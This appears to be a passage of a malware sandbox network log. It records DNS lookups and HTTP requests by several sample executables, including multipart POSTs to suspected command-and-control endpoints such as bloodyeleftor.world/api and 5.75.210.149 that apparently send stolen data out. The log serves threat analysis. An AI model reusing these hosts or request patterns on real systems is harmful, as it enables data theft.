                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              DNS
                                                                                              voicesharped.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              voicesharped.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              inputrreparnt.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              inputrreparnt.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              torpdidebar.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              torpdidebar.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              actiothreaz.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              actiothreaz.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              garulouscuto.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              garulouscuto.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              breedertremnd.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              breedertremnd.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              steamcommunity.com
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              Response
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              104.82.234.109
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://steamcommunity.com/profiles/76561199822375128
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.82.234.109:443
                                                                                              Request
                                                                                              GET /profiles/76561199822375128 HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: steamcommunity.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Length: 35769
                                                                                              Connection: keep-alive
                                                                                              Set-Cookie: sessionid=404c68a6a317a158bee92dbd; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----db1djeu3wbsrqiw4wlx4
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 218917
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              DNS
                                                                                              bloodyeleftor.world
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              bloodyeleftor.world
                                                                                              IN A
                                                                                              Response
                                                                                              bloodyeleftor.world
                                                                                              IN A
                                                                                              104.21.63.231
                                                                                              bloodyeleftor.world
                                                                                              IN A
                                                                                              172.67.172.150
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXJoaTc%2BdyzpjouVNXlcN39NW%2FOHE7UfAYFSFjZqnkvfy2tEoS91jDtRuuIew%2FuP1qhVwBwuP4G5pp7EXmBI%2BpxgufGu6WHfHbtzd%2F6mZtTNL3nWkHQ%2BBxk9KcDDN5EzvldIbnWq"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6858accf539c-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 42
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=qnro1pdfds747h6btm5qsd16oo; expires=Fri, 21 Feb 2025 00:33:51 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iI3F5RoHRxEW5N%2BPdRETVm%2Fy6AjbqS%2BpYccqIFgbDTEUBVZW9sxv7YN7gNxiroaFal%2Bd78GLSkiyCie6xc%2FxhmnyH0JagJJz3ccBJOYoGPlVzLUbBUzBq9T14xv7%2FGRag5H3i3f6"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a68590d0d539c-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42450&min_rtt=41849&rtt_var=4208&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8582&recv_bytes=1067&delivery_rate=191599&cwnd=257&unsent_bytes=0&cid=de8d8973d2242c9a&ts=377&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=S49YJ1BO19
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1579
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=5ic75np658ot56gpvpiepan4d1; expires=Fri, 21 Feb 2025 00:33:51 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppMZuh6YomZhUQX6bfNKRcvx%2B6oOv2aIsuX4N6V5IImYM7bBA0%2F%2F72XXlY%2B8%2FMr1Pv11io5lqTlH6D3dMTFseHIUWR2Dq2t2KuOlODS3Hoi6xUU8jmJvTGU1OfTDUb%2FDMdN1rqAM"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a685b6f1e539c-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42416&min_rtt=41849&rtt_var=3225&sent=16&recv=16&lost=0&retrans=0&sent_bytes=9759&recv_bytes=3069&delivery_rate=191599&cwnd=257&unsent_bytes=0&cid=de8d8973d2242c9a&ts=637&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              vanaheim.cn
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              vanaheim.cn
                                                                                              IN A
                                                                                              Response
                                                                                              vanaheim.cn
                                                                                              IN A
                                                                                              2.59.161.190
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----0z58g4wlnycje3ohvas0
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 55081
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=MZ4OB14E0VQ05
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1072
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=i6g5ce9opd3i3l0ef648ha795b; expires=Fri, 21 Feb 2025 00:33:52 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1if0%2F7ohdlWg1KMDSDBkWS23bgmmVJuGDNqlrrqwoQvnRPOuexCxZ0qIAu%2FgMbyk1KAUzlsxCj6FOjZboj5EJAkOPQ%2FDh8V9GSC9MwI8CG%2B5Ofrhz8e6iWBmfgkZet8BpatQ%2F3w"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a685dbc7577a1-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42068&min_rtt=41776&rtt_var=9273&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3307&recv_bytes=1777&delivery_rate=93715&cwnd=253&unsent_bytes=0&cid=9994056eb953efd1&ts=292&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 77
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=avvmf1gkqp8g01uls65fhqocbb; expires=Fri, 21 Feb 2025 00:33:52 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzDDo7G4F6TOfkAdKh3WMFNowSKcxTKYVJVW4M7VR75iCjIuL6PPAU6z27BXr4eIYh1J93iHJ4OyGatYjBErs2xSi6KXYJSGQBcmDxccsqo955%2BwIKrnWejkKS7t7Fu9sy0dLyas"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a68601c560876-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42419&min_rtt=42211&rtt_var=9283&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=770&delivery_rate=92866&cwnd=253&unsent_bytes=0&cid=bcec1dbf4bdd7437&ts=285&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.dnsbl.sorbs.net
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.dnsbl.sorbs.net
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.bl.spamcop.net
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.bl.spamcop.net
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.zen.spamhaus.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.zen.spamhaus.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.sbl-xbl.spamhaus.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.sbl-xbl.spamhaus.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.cbl.abuseat.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.cbl.abuseat.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              impactsupport.world
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              impactsupport.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:58 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pXFMfq1ZW78EHQ7lVHw8Y7DiLU69xw8giclcgr0KAB%2BbMYWxzFAIsKMYSvp53wXF1HwhmHv4rwi%2B0%2BZz5tph%2FVeJ9dg1yidafXNPitnQumNLnPYA5LpWcvcL9y2exrBLepVE6Nw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a68879ce2ef49-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 48
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:59 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=907t8ia7pnr21dpsa2d0gqtrog; expires=Fri, 21 Feb 2025 00:33:59 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbUnlNzXQXeRuiyexXytjSo8%2Blv9%2FztoLOzGVNH8TwdRIeZ9I8rE%2FIAELdblMv4tKjFFhe7u8Ant4MEkkoHtgnPQ0fgCM9F09xliT2ak6Ic%2FwM8TmouLoWsx%2BmOv1ZN4ImHIdF4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6889af85ef49-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=48276&min_rtt=44291&rtt_var=8506&sent=15&recv=12&lost=0&retrans=1&sent_bytes=8606&recv_bytes=1070&delivery_rate=155177&cwnd=257&unsent_bytes=0&cid=d3207fc2c2569cba&ts=657&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=FQE00QT5KR0N
                                                                                              Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1596
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:59 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=cr5h6ce3051099226n3lpvoea6; expires=Fri, 21 Feb 2025 00:33:59 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVWUWspoR1QprFe%2FJVXu97AJzUcKfKnRKZhntVTpJEaPscj7p5%2Fvc%2F4vqxPlsZBAkPedALzVXlaBTRX%2FjNJJBHrhD6l3ipaFFDOwAZGNLlfVYFuOrz%2BBX0QkJ7f%2F5gyOSeRB768%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a688bb9e6ef49-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=48602&min_rtt=44291&rtt_var=7032&sent=20&recv=16&lost=0&retrans=1&sent_bytes=9783&recv_bytes=3090&delivery_rate=155177&cwnd=257&unsent_bytes=0&cid=d3207fc2c2569cba&ts=899&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=CO9CS5DIJQ
                                                                                              Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1066
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=q29c3rb3kubt9vlcje9bbqbhfb; expires=Fri, 21 Feb 2025 00:34:00 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdDSw%2FPoEs22NHEMFA9yJbU8mXnT3o60JroCGI5Rofrrz8y7SXyl56683W5frsCyqW%2FGaQ9Zqq249SIVFXVIsceyKuRQHNoQQo9oszQvzkqWsYjYiEVx%2BSLLxJr9pBNNZ3jTYOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a688def9386d0-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42079&min_rtt=41908&rtt_var=9120&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3301&recv_bytes=1766&delivery_rate=95292&cwnd=253&unsent_bytes=0&cid=c82ecceffda75930&ts=237&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 82
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=mutmv66d8p1gr6vh14ts1tjmjh; expires=Fri, 21 Feb 2025 00:34:00 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqcpyWH5nj7lIoBV3HdgHkaqbJEu4HyHYqUNQ41Z4OZDOWgp7K%2BwwShSWDkfYMnSxpMQz44CD1vQl%2Bw1cNgqOo7OQecfnY15I68RbpxIDvEETBsVvyGf50IvttwfkuFz6D4n8aw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a688feac888cb-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42009&min_rtt=41808&rtt_var=9151&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=773&delivery_rate=95150&cwnd=253&unsent_bytes=0&cid=d46a35546e43b876&ts=293&x=0"
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
